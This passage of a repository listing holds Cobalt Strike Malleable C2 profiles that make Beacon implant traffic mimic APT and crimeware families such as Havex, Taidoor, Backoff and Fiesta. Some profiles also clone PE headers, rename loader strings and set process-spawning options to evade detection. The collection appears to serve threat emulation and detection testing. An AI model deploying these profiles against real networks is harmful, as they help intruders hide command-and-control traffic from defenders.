├── APT ├── apt1_virtuallythere.profile ├── comfoo.profile ├── etumbot.profile ├── havex.profile ├── meterpreter.profile ├── pitty_tiger.profile ├── putter.profile ├── string_of_paerls.profile └── taidoor.profile ├── crimeware ├── asprox.profile ├── backoff.profile ├── fiesta.profile ├── fiesta2.profile ├── magnitude.profile └── zeus.profile └── normal ├── amazon.profile ├── bingsearch_getonly.profile ├── cnnvideo_getonly.profile ├── gmail.profile ├── googledrive_getonly.profile ├── microsoftteams_getonly.profile ├── microsoftupdate_getonly.profile ├── msnbcvideo_getonly.profile ├── ocsp.profile ├── onedrive_getonly.profile ├── pandora.profile ├── randomized.profile ├── reference.profile ├── rtmp.profile ├── safebrowsing.profile ├── webbug.profile ├── webbug_getonly.profile └── wikipedia_getonly.profile /APT/apt1_virtuallythere.profile: -------------------------------------------------------------------------------- 1 | # APT1 VIRTUALLYTHERE SSL 2 | # 3 | # Reference: Mandiant's APT1 Report 4 | # Digital Appendix F - SSL Certificates 5 | # http://intelreport.mandiant.com/ 6 | # 7 | # Author: @armitagehacker 8 | set sample_name "APT1 Virtually There Malware"; 9 | 10 | # this is the certificate 11 | https-certificate { 12 | set C "US"; 13 | set ST "Some-State"; 14 | set O "www.virtuallythere.com"; 15 | set OU "new"; 16 | set CN "new"; 17 | } 18 | 19 | # since *cough* presumably you're using an HTTPS Beacon... 
20 | http-get { 21 | set uri "/zOMGAPT"; 22 | 23 | client { 24 | metadata { 25 | netbiosu; 26 | parameter "tmp"; 27 | } 28 | } 29 | 30 | server { 31 | header "Content-Type" "application/octet-stream"; 32 | 33 | output { 34 | print; 35 | } 36 | } 37 | } 38 | 39 | http-post { 40 | set uri "/BUYTHEAPTDETECTORNOW"; 41 | 42 | client { 43 | header "Content-Type" "application/octet-stream"; 44 | 45 | id { 46 | uri-append; 47 | } 48 | 49 | output { 50 | print; 51 | } 52 | } 53 | 54 | server { 55 | header "Content-Type" "text/html"; 56 | 57 | output { 58 | print; 59 | } 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /APT/comfoo.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Comfoo profile 3 | # http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # use a ~30s delay between callbacks 9 | set jitter "20"; 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)"; 12 | 13 | http-get { 14 | 15 | set uri "/CWoNaJLBo/VTNeWw11212/"; 16 | 17 | client { 18 | 19 | header "Accept" "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*"; 20 | header "Accept-Language" "en-en"; 21 | header "Connection" "Keel-Alive"; 22 | header "Cache-Control" "no-cache"; 23 | 24 | metadata { 25 | netbiosu; 26 | append "/UTWOqVQ132/"; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Server" "Apache/2.0.50 (Unix)"; 34 | header "Keep-Alive" "timeout=15, max=90"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/CWoNaJLBo/VTNeWw11213/"; 45 | 46 | client { 47 | 48 | header "Accept" "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*"; 49 | header "Accept-Language" "en-en"; 50 | header "Connection" "Keel-Alive"; 51 | header "Cache-Control" "no-cache"; 52 | 53 | id { 54 | netbiosu; 55 | append 
"/UTWOqVQ132/"; 56 | uri-append; 57 | } 58 | 59 | output { 60 | print; 61 | } 62 | } 63 | 64 | server { 65 | 66 | header "Server" "Apache/2.0.50 (Unix)"; 67 | header "Keep-Alive" "timeout=15, max=90"; 68 | 69 | output { 70 | base64; 71 | print; 72 | } 73 | } 74 | } 75 | 76 | -------------------------------------------------------------------------------- /APT/etumbot.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Etumbot Profile 3 | # http://www.arbornetworks.com/asert/2014/06/illuminating-the-etumbot-apt-backdoor/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Etumbot"; 8 | 9 | set sleeptime "5000"; 10 | set jitter "0"; 11 | set maxdns "255"; 12 | set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)"; 13 | 14 | http-get { 15 | 16 | set uri "/image/"; 17 | 18 | client { 19 | 20 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8"; 21 | header "Referer" "http://www.google.com"; 22 | header "Pragma" "no-cache"; 23 | header "Cache-Control" "no-cache"; 24 | 25 | metadata { 26 | netbios; 27 | append "-.jpg"; 28 | uri-append; 29 | } 30 | } 31 | 32 | server { 33 | 34 | header "Content-Type" "img/jpg"; 35 | header "Server" "Microsoft-IIS/6.0"; 36 | header "X-Powered-By" "ASP.NET"; 37 | 38 | output { 39 | base64; 40 | print; 41 | } 42 | } 43 | } 44 | 45 | http-post { 46 | set uri "/history/"; 47 | 48 | client { 49 | 50 | header "Content-Type" "application/octet-stream"; 51 | header "Referer" "http://www.google.com"; 52 | header "Pragma" "no-cache"; 53 | header "Cache-Control" "no-cache"; 54 | 55 | id { 56 | netbiosu; 57 | append ".asp"; 58 | uri-append; 59 | } 60 | 61 | output { 62 | base64; 63 | print; 64 | } 65 | } 66 | 67 | server { 68 | 69 | header "Content-Type" "img/jpg"; 70 | header "Server" "Microsoft-IIS/6.0"; 71 | header "X-Powered-By" "ASP.NET"; 72 | 73 | output { 74 | base64; 75 | print; 76 | } 77 | } 78 | } 79 | 80 | 
-------------------------------------------------------------------------------- /APT/havex.profile: -------------------------------------------------------------------------------- 1 | # havex trojan C&C profile 2 | # Actor: Energetic Bear / Crouching Yeti / Dragonfly 3 | # 4 | # See: 5 | # . http://www.symantec.com/connect/blogs/emerging-threat-dragonfly-energetic-bear-apt-group 6 | # . https://securelist.com/files/2014/07/EB-YetiJuly2014-Public.pdf 7 | # . http://pastebin.com/qCdMwtZ6 8 | # . http://www.crowdstrike.com/sites/all/themes/crowdstrike2/css/imgs/platform/CrowdStrike_Global_Threat_Report_2013.pdf 9 | # . https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Havex.yar 10 | # . http://web.archive.org/web/20170808180137/www.f-secure.com/weblog/archives/00002718.html 11 | # . https://www.virustotal.com/#/file/3d3daee1a38e67707921b222f1685d5bd6328af2fc80d4c11d92dc6a6c289261/details 12 | # 13 | # Author: @armitagehacker 14 | 15 | set sample_name "HaveX Trojan"; 16 | 17 | set sleeptime "30000"; 18 | 19 | set useragent "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08"; 20 | 21 | set pipename "mypipe-f##"; 22 | set pipename_stager "mypipe-h##"; 23 | 24 | # Clone some header values (Sample from: https://malshare.com/sample.php?action=detail&hash=c6e161a948f4474849d5740b2f27964a) 25 | # ./peclone c6e161a948f4474849d5740b2f27964a 26 | stage { 27 | set checksum "0"; 28 | set compile_time "30 Dec 2013 07:53:48"; 29 | set entry_point "134733"; 30 | set image_size_x86 "348160"; 31 | set image_size_x64 "348160"; 32 | set name "Tmprovider.dll"; 33 | set rich_header 
"\x63\x02\x25\x0f\x27\x63\x4b\x5c\x27\x63\x4b\x5c\x27\x63\x4b\x5c\x9a\x2c\xdd\x5c\x24\x63\x4b\x5c\x2e\x1b\xde\x5c\x3b\x63\x4b\x5c\x2e\x1b\xcf\x5c\x1b\x63\x4b\x5c\x2e\x1b\xc8\x5c\x8f\x63\x4b\x5c\x00\xa5\x30\x5c\x28\x63\x4b\x5c\x27\x63\x4a\x5c\x97\x63\x4b\x5c\x2e\x1b\xc1\x5c\x60\x63\x4b\x5c\x2e\x1b\xd9\x5c\x26\x63\x4b\x5c\x39\x31\xdf\x5c\x26\x63\x4b\x5c\x2e\x1b\xda\x5c\x26\x63\x4b\x5c\x52\x69\x63\x68\x27\x63\x4b\x5c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 34 | 35 | # disable this little obfuscation 36 | set stomppe "false"; 37 | 38 | # make these things havex-ish 39 | transform-x86 { 40 | strrep "ReflectiveLoader" "RunDllEntry"; 41 | strrep "beacon.dll" ""; 42 | } 43 | 44 | transform-x64 { 45 | strrep "ReflectiveLoader" "RunDllEntry"; 46 | strrep "beacon.x64.dll" ""; 47 | } 48 | 49 | # strings gathered from Yara rules and sandbox string dumps 50 | stringw "%s <%s> (Type=%i, Access=%i, ID='%s')"; 51 | stringw "%02i was terminated by ThreadManager(2)\n"; 52 | stringw "main sort initialise ...\n"; 53 | stringw "qsort [0x%x, 0x%x] done %d this %d\n"; 54 | stringw "{0x%08x, 0x%08x}"; 55 | stringw "Programm was started at %02i:%02i:%02i\n"; 56 | stringw "a+"; 57 | stringw "%02i:%02i:%02i.%04i:"; 58 | stringw "**************************************************************************\n"; 59 | stringw "Start finging of LAN hosts...\n"; 60 | stringw "Finding was fault. Unexpective error\n"; 61 | stringw "Hosts was't found.\n"; 62 | stringw "\t\t\t\t\t%O2i) [%s]\n"; 63 | stringw "Start finging of OPC Servers..."; 64 | stringw "Was found %i OPC Servers."; 65 | stringw "\t\t%i) [%s\\%s]\n\t\t\tCLSID: %s\n"; 66 | stringw "\t\t\tUserType: %s\n\t\t\tVerIndProgID: %s\n"; 67 | stringw "OPC Servers not found. 
Programm finished"; 68 | stringw "Start finging of OPC Tags..."; 69 | stringw "[-]Threads number > Hosts number"; 70 | stringw "[-]Can not get local ip"; 71 | stringw "[!]Start"; 72 | stringw "[+]Get WSADATA"; 73 | stringw "[+]Local:"; 74 | stringw "[-]Connection error"; 75 | stringw "Was found %i hosts in LAN:"; 76 | stringw "%s[%s]!!!EXEPTION %i!!!"; 77 | stringw "final combined CRC = 0x%08x"; 78 | } 79 | 80 | http-get { 81 | set uri "/include/template/isx.php /wp06/wp-includes/po.php /wp08/wp-includes/dtcla.php"; 82 | 83 | client { 84 | header "Referer" "http://www.google.com"; 85 | header "Accept" "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"; 86 | header "Accept-Language" "en-us,en;q=0.5"; 87 | 88 | # base64 encoded Cookie is not a havex indicator, but a place to stuff our data 89 | metadata { 90 | base64; 91 | header "Cookie"; 92 | } 93 | } 94 | 95 | server { 96 | header "Server" "Apache/2.2.26 (Unix)"; 97 | header "X-Powered-By" "PHP/5.3.28"; 98 | header "Cache-Control" "no-cache"; 99 | header "Content-Type" "text/html"; 100 | header "Keep-Alive" "timeout=3, max=100"; 101 | 102 | output { 103 | base64; 104 | prepend "Sorry, no data corresponding your request."; 106 | print; 107 | } 108 | } 109 | } 110 | 111 | # define indicators for an HTTP POST 112 | http-post { 113 | set uri "/modules/mod_search.php /blog/wp-includes/pomo/src.php /includes/phpmailer/class.pop3.php"; 114 | 115 | client { 116 | header "Content-Type" "application/octet-stream"; 117 | 118 | # transmit our sess id as /whatever.php?id=[identifier] 119 | id { 120 | parameter "id"; 121 | } 122 | 123 | # post our output with no real changes 124 | output { 125 | print; 126 | } 127 | } 128 | 129 | # The server's response to our HTTP POST 130 | server { 131 | header "Server" "Apache/2.2.26 (Unix)"; 132 | header "X-Powered-By" "PHP/5.3.28"; 133 | header "Cache-Control" "no-cache"; 134 | header "Content-Type" "text/html"; 135 | header "Keep-Alive" 
"timeout=3, max=100"; 136 | 137 | # this will just print an empty string, meh... 138 | output { 139 | prepend "blah blah blah"; 140 | mask; 141 | base64; 142 | prepend "Sorry, no data corresponding your request."; 144 | print; 145 | } 146 | } 147 | } 148 | -------------------------------------------------------------------------------- /APT/meterpreter.profile: -------------------------------------------------------------------------------- 1 | # Meterpreter profile 2 | # 3 | # This was a fun exercise, make Beacon Meterpreter-like. :) 4 | # 5 | # https://www.metasploit.com/ 6 | # 7 | set sample_name "Meterpreter"; 8 | 9 | # 100ms sleep time. 10 | set sleeptime "100"; 11 | 12 | # what else would we spawn to? 13 | set spawnto_x86 "%windir%\\syswow64\\notepad.exe"; 14 | set spawnto_x64 "%windir%\\sysnative\\notepad.exe"; 15 | 16 | # process injection tweak 17 | set hijack_remote_thread "false"; 18 | 19 | # propagate user-agent to all transactions 20 | set useragent "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"; 21 | 22 | # set some PE and memory indicators to resemble the metasploit rDLL 23 | stage { 24 | # PE header fields 25 | set checksum "0"; 26 | set compile_time "08 May 2017 23:13:38"; 27 | set entry_point "558586"; 28 | set image_size_x86 "987136"; 29 | set image_size_x64 "1232896"; 30 | set name "metsrv.dll"; 31 | set rich_header "\xf4\x1f\x93\x1a\xb0\x7e\xfd\x49\xb0\x7e\xfd\x49\xb0\x7e\xfd\x49\xf6\x2f\x1c\x49\x9d\x7e\xfd\x49\xf6\x2f\x22\x49\xaf\x7e\xfd\x49\xf6\x2f\x1d\x49\x0b\x7e\xfd\x49\xcd\x07\x1d\x49\x3f\x7f\xfd\x49\xb0\x7e\xfc\x49\x63\x7e\xfd\x49\xb9\x06\x6e\x49\xa1\x7e\xfd\x49\xb9\x06\x7e\x49\xb1\x7e\xfd\x49\xbd\x2c\x22\x49\xb1\x7e\xfd\x49\xbd\x2c\x1d\x49\xaa\x7e\xfd\x49\xbd\x2c\x21\x49\xb1\x7e\xfd\x49\xbd\x2c\x23\x49\xb1\x7e\xfd\x49\x52\x69\x63\x68\xb0\x7e\xfd\x49\x00\x00\x00\x00\x00\x00\x00\x00"; 32 | 33 | # obfuscations 34 | set userwx "true"; 35 | set stomppe "false"; 36 | 37 | # strings 38 | stringw "%04x-%04x:%s"; 39 | stringw 
"pipe"; 40 | stringw "SeSecurityPrivilege"; 41 | stringw "pipe"; 42 | stringw "\\\\%s\\pipe\\%s"; 43 | stringw "https"; 44 | stringw "POST"; 45 | stringw "POST"; 46 | string "stdapi_sys_process_getpid"; 47 | string "[%x]"; 48 | string "buffer_from_file"; 49 | string "buffer_to_file"; 50 | string "channel_close"; 51 | string "channel_create"; 52 | 53 | # get rid of some stuff 54 | transform-x86 { 55 | strrep "beacon.dll" ""; 56 | } 57 | 58 | transform-x64 { 59 | strrep "beacon.x64.dll" ""; 60 | } 61 | } 62 | 63 | # SSL cert 64 | https-certificate { 65 | set O "dmcjna"; 66 | set CN "dmcjna"; 67 | set validity "3285"; 68 | } 69 | 70 | # staging process 71 | http-stager { 72 | server { 73 | header "Content-Type" "application/octet-stream"; 74 | header "Connection" "Keep-Alive"; 75 | header "Server" "Apache"; 76 | } 77 | } 78 | 79 | # HTTP GET 80 | http-get { 81 | set uri "/ucD"; 82 | 83 | client { 84 | header "Cache-Control" "no-cache"; 85 | header "Connection" "Keep-Alive"; 86 | header "Pragma" "no-cache"; 87 | 88 | metadata { 89 | base64url; 90 | uri-append; 91 | } 92 | } 93 | 94 | server { 95 | header "Content-Type" "application/octet-stream"; 96 | header "Connection" "Keep-Alive"; 97 | header "Server" "Apache"; 98 | 99 | output { 100 | print; 101 | } 102 | } 103 | } 104 | 105 | # HTTP POST 106 | http-post { 107 | set uri "/ucW"; 108 | 109 | client { 110 | header "Cache-Control" "no-cache"; 111 | header "Connection" "Keep-Alive"; 112 | header "Pragma" "no-cache"; 113 | 114 | id { 115 | base64url; 116 | append "UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ"; 117 | uri-append; 118 | } 119 | 120 | output { 121 | print; 122 | } 123 | } 124 | 125 | # The server's response to our HTTP POST 126 | server { 127 | header "Content-Type" "application/octet-stream"; 128 | header "Connection" "Keep-Alive"; 129 | header "Server" "Apache"; 130 | 131 | # this will just print an empty string, meh... 
132 | output { 133 | print; 134 | } 135 | } 136 | } 137 | -------------------------------------------------------------------------------- /APT/pitty_tiger.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Pitty Tiger RAT profile 3 | # http://bitbucket.cassidiancybersecurity.com/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf 4 | # 5 | # One of several RATs used by the Pitty Tiger campaign 6 | # 7 | # Author: @harmj0y 8 | # 9 | set sample_name "Pitty Tiger RAT"; 10 | 11 | set sleeptime "30000"; # use a ~30s delay between callbacks 12 | set jitter "20"; 13 | set maxdns "255"; 14 | set useragent "Microsoft Internet Explorer"; 15 | 16 | http-get { 17 | 18 | set uri "/FC001/JOHN"; 19 | 20 | client { 21 | 22 | header "Host" "newb02.skypetm.com.tw"; 23 | header "Connection" "Keel-Alive"; 24 | 25 | metadata { 26 | netbiosu; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Connection" "Keel-Alive"; 34 | header "Content-Type" "text/html"; 35 | header "Server" "IIS5.0"; 36 | 37 | output { 38 | base64; 39 | print; 40 | } 41 | } 42 | } 43 | 44 | http-post { 45 | set uri "/FC002/JOHN-"; 46 | 47 | client { 48 | 49 | header "Host" "newb02.skypetm.com.tw"; 50 | header "Connection" "Keel-Alive"; 51 | 52 | id { 53 | netbiosu; 54 | uri-append; 55 | } 56 | 57 | output { 58 | base64; 59 | print; 60 | } 61 | } 62 | 63 | server { 64 | 65 | header "Connection" "Keel-Alive"; 66 | header "Content-Type" "text/html"; 67 | header "Server" "IIS5.0"; 68 | 69 | output { 70 | base64; 71 | print; 72 | } 73 | } 74 | } 75 | 76 | -------------------------------------------------------------------------------- /APT/putter.profile: -------------------------------------------------------------------------------- 1 | # Putter Panda HTTPCLIENT Profile 2 | # http://resources.crowdstrike.com/putterpanda/ 3 | # 4 | # Author: @armitagehacker 5 | 6 | # 500ms is default callback for this Web C2 shell 7 | set sample_name "Putter 
Panda"; 8 | 9 | set sleeptime "500"; 10 | 11 | http-get { 12 | # Beacon will randomly choose from this pool of URIs 13 | set uri "/MicrosoftUpdate/ShellEx/KB242742/default.aspx"; 14 | 15 | client { 16 | header "User-Agent" "Mozilla/4.0 (Compatible; MSIE 6.0;Windows NT 5.1)"; 17 | 18 | # deliberate attempt to reproduce bug in HTTPCLIENT 19 | header "Accept" "*/*, ..., ......, ."; 20 | 21 | # encode session metadata into tmp var 22 | metadata { 23 | netbiosu; 24 | parameter "tmp"; 25 | } 26 | } 27 | 28 | # no special server side indicators as the report didn't say anything one way 29 | # or the other about these. 30 | server { 31 | header "Content-Type" "application/octet-stream"; 32 | 33 | output { 34 | print; 35 | } 36 | } 37 | } 38 | 39 | http-post { 40 | set uri "/MicrosoftUpdate/GetUpdate/KB"; 41 | 42 | client { 43 | header "Content-Type" "application/octet-stream"; 44 | header "User-Agent" "Mozilla/4.0 (Compatible; MSIE 6.0;Windows NT 5.1)"; 45 | 46 | id { 47 | append "/default.asp"; 48 | uri-append; 49 | } 50 | 51 | output { 52 | print; 53 | } 54 | } 55 | 56 | server { 57 | header "Content-Type" "text/html"; 58 | 59 | output { 60 | print; 61 | } 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /APT/string_of_paerls.profile: -------------------------------------------------------------------------------- 1 | # 2 | # String of Paerls profile 3 | # http://blogs.cisco.com/security/a-string-of-paerls/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "String of Paerls"; 8 | 9 | set sleeptime "30000"; # use a ~30 second main interval 10 | set jitter "30"; # 30% jitter (matches the value set above) 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0"; 13 | 14 | http-get { 15 | 16 | # GET request modeled as well as possible based on incomplete information 17 | set uri "/2/R.exe"; 18 | 19 | client { 20 | 21 | header "Content-Type" "application/x-www-form-urlencoded"; 22 | 23 | # encode session metadata 24 | metadata { 25 | base64; 26 | 
header "Cookie"; 27 | } 28 | } 29 | 30 | server { 31 | header "Server" "Apache/2"; 32 | header "X-Powered-By" "PHP/5.3.28"; 33 | header "Vary" "User-Agent"; 34 | header "Content-Type" "application/octet-stream"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/boss/image.php"; 45 | 46 | client { 47 | 48 | header "Content-Type" "application/x-www-form-urlencoded"; 49 | 50 | id { 51 | netbios; 52 | parameter "id"; 53 | } 54 | 55 | output { 56 | base64; 57 | print; 58 | } 59 | } 60 | 61 | server { 62 | header "Server" "Apache/2"; 63 | header "X-Powered-By" "PHP/5.3.28"; 64 | header "Vary" "User-Agent"; 65 | header "Content-Type" "application/octet-stream"; 66 | 67 | output { 68 | print; 69 | } 70 | } 71 | } 72 | 73 | -------------------------------------------------------------------------------- /APT/taidoor.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Taidoor Profile 3 | # http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Taidoor"; 8 | 9 | set sleeptime "40000"; # use a ~40 second main interval 10 | set jitter "35"; # 35% jitter 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"; 13 | 14 | http-get { 15 | 16 | set uri "/login.jsp /parse.jsp /page.jsp /default.jsp /index.jsp /process.jsp /security.jsp /user.jsp"; 17 | 18 | client { 19 | 20 | header "Connection" "Keep-Alive"; 21 | header "Cache-Control" "no-cache"; 22 | 23 | # encode session metadata 24 | metadata { 25 | netbiosu; 26 | parameter "mn"; 27 | } 28 | } 29 | 30 | # no special server side indicators as the report didn't say anything one way 31 | # or the other about these. 
32 | server { 33 | header "Server" "Microsoft-IIS/5.0"; 34 | header "Content-Type" "text/html"; 35 | header "Connection" "close"; 36 | 37 | output { 38 | base64; 39 | prepend "\n"; 44 | append "\n"; 45 | append "\n"; 46 | print; 47 | } 48 | } 49 | } 50 | 51 | http-post { 52 | set uri "/submit.jsp"; 53 | 54 | client { 55 | 56 | header "Connection" "Keep-Alive"; 57 | header "Cache-Control" "no-cache"; 58 | 59 | id { 60 | netbios; 61 | parameter "du"; 62 | } 63 | 64 | output { 65 | print; 66 | } 67 | } 68 | 69 | server { 70 | header "Server" "Microsoft-IIS/5.0"; 71 | header "Content-Type" "text/html"; 72 | header "Connection" "close"; 73 | 74 | output { 75 | print; 76 | } 77 | } 78 | } 79 | 80 | -------------------------------------------------------------------------------- /crimeware/asprox.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Asprox botnet traffic profile 3 | # http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Asprox Botnet"; 8 | 9 | set sleeptime "30000"; # use a ~30s delay between callbacks 10 | set jitter "20"; # throw in a 20% jitter (matches the value set above) 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"; 13 | 14 | http-get { 15 | 16 | set uri "/"; 17 | 18 | client { 19 | 20 | header "Accept" "*/*"; 21 | header "Content-Type" "application/x-www-form-urlencoded"; 22 | header "Content-Transfer-Encoding" "base64"; 23 | header "Connection" "Keep-Alive"; 24 | 25 | metadata { 26 | netbiosu; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Server" "nginx/1.2.5"; 34 | header "Content-Type" "text/html"; 35 | header "X-Powered-By" "PHP/5.4.4-7"; 36 | header "Vary" "Accept-Encoding"; 37 | 38 | output { 39 | base64; 40 | print; 41 | } 42 | } 43 | } 44 | 45 | http-post { 46 | 47 | # random hash to try to simulate the post uri in the report 
48 | set uri "/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1"; 49 | 50 | client { 51 | 52 | header "Accept" "*/*"; 53 | header "Content-Type" "application/x-www-form-urlencoded"; 54 | header "Content-Transfer-Encoding" "base64"; 55 | header "Connection" "Keep-Alive"; 56 | 57 | id { 58 | parameter "id"; 59 | } 60 | 61 | output { 62 | base64; 63 | print; 64 | } 65 | } 66 | 67 | server { 68 | 69 | header "Server" "nginx/1.2.5"; 70 | header "Content-Type" "text/html"; 71 | header "X-Powered-By" "PHP/5.4.4-7"; 72 | header "Vary" "Accept-Encoding"; 73 | 74 | output { 75 | base64; 76 | print; 77 | } 78 | } 79 | } 80 | 81 | -------------------------------------------------------------------------------- /crimeware/backoff.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Backoff POS Malware 3 | # 4 | # This profile takes steps to dress up the POST side of Beacon's C2 to 5 | # look like Backoff. The GET side is left generic. 6 | # 7 | # Indicators from: 8 | # http://blog.spiderlabs.com/2014/07/backoff-technical-analysis.html 9 | # https://gsr.trustwave.com/topics/backoff-pos-malware/backoff-malware-overview/ 10 | # 11 | # Author: @armitagehacker 12 | # 13 | # 14 | set sample_name "Backoff POS Malware"; 15 | 16 | set sleeptime "30000"; # use a ~30s delay between callbacks 17 | set jitter "10"; # throw in a 10% jitter 18 | 19 | set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0"; 20 | 21 | # the relevant indicators 22 | http-post { 23 | set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php"; 24 | 25 | client { 26 | header "Accept" "text/plain"; 27 | header "Accept-Language" "en-us"; 28 | header "Accept-Encoding" "text/plain"; 29 | header "Content-Type" "application/x-www-form-urlencoded"; 30 | 31 | id { 32 | netbios; 33 | parameter "id"; 34 | } 35 | 36 | output { 37 | base64; 38 | prepend "&op=1&id=vxeykS&ui=Josh @ 
PC&wv=11&gr=backoff&bv=1.55&data="; 39 | print; 40 | } 41 | } 42 | 43 | server { 44 | output { 45 | print; 46 | } 47 | } 48 | } 49 | 50 | # No information on backoff use of GET, so generic GET request. 51 | http-get { 52 | set uri "/updates"; 53 | 54 | client { 55 | metadata { 56 | netbiosu; 57 | prepend "user="; 58 | header "Cookie"; 59 | } 60 | } 61 | 62 | server { 63 | header "Content-Type" "text/plain"; 64 | 65 | output { 66 | base64; 67 | print; 68 | } 69 | } 70 | } 71 | 72 | -------------------------------------------------------------------------------- /crimeware/fiesta.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Fiesta Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/04/05/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # use a ~30s delay between callbacks 9 | set jitter "10"; # throw in a 10% jitter 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11"; 12 | 13 | http-get { 14 | 15 | set uri "/rmvk30g/"; 16 | 17 | client { 18 | # mimic this Fiesta instance's header information 19 | header "Accept" "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"; 20 | header "Connection" "keep-alive"; 21 | 22 | # encode session metadata as close as we can to a Fiesta URI request 23 | metadata { 24 | netbios; 25 | append ";1;4;1"; 26 | uri-append; 27 | } 28 | } 29 | 30 | server { 31 | header "Server" "Apache/2.2.15 (CentOS)"; 32 | header "X-Powered-By" "PHP/5.3.27"; 33 | header "Content-Type" "application/octet-stream"; 34 | header "Connection" "close"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/"; 45 | 46 | client { 47 | 48 | # fake out a different user agent for the post back 49 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)"; 50 
| 51 | id { 52 | netbios; 53 | uri-append; 54 | } 55 | 56 | output { 57 | base64; 58 | print; 59 | } 60 | } 61 | 62 | server { 63 | header "Server" "nginx/1.4.2"; 64 | header "Content-Type" "text/html"; 65 | header "Connection" "close"; 66 | 67 | output { 68 | base64; 69 | print; 70 | } 71 | } 72 | } 73 | 74 | -------------------------------------------------------------------------------- /crimeware/fiesta2.profile: -------------------------------------------------------------------------------- 1 | # 2 | # A second Fiesta Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/04/05/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Fiesta Exploit Kit"; 8 | 9 | set sleeptime "30000"; # use a ~30s delay between callbacks 10 | set jitter "10"; # throw in a 10% jitter 11 | set maxdns "255"; 12 | 13 | http-get { 14 | 15 | set uri "/v20idaf/"; 16 | 17 | client { 18 | # mimic this Fiesta instance's header information 19 | header "Accept" "*/*"; 20 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"; 21 | 22 | # encode session metadata as close as we can to a Fiesta URI request 23 | metadata { 24 | netbios; 25 | append ";112202;228"; 26 | uri-append; 27 | } 28 | } 29 | 30 | server { 31 | header "Server" "nginx/1.4.4"; 32 | header "Content-Type" "application/octet-stream"; 33 | header "Connection" "close"; 34 | 35 | output { 36 | print; 37 | } 38 | } 39 | } 40 | 41 | http-post { 42 | 43 | set uri "/"; 44 | 45 | client { 46 | 47 | header "Accept" "*/*"; 48 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"; 49 | 50 | id { 51 | netbios; 52 | uri-append; 53 | } 54 | 55 | output { 56 | base64; 57 | print; 58 | } 59 | } 60 | 61 | server { 62 | header "Server" "nginx/1.4.4"; 63 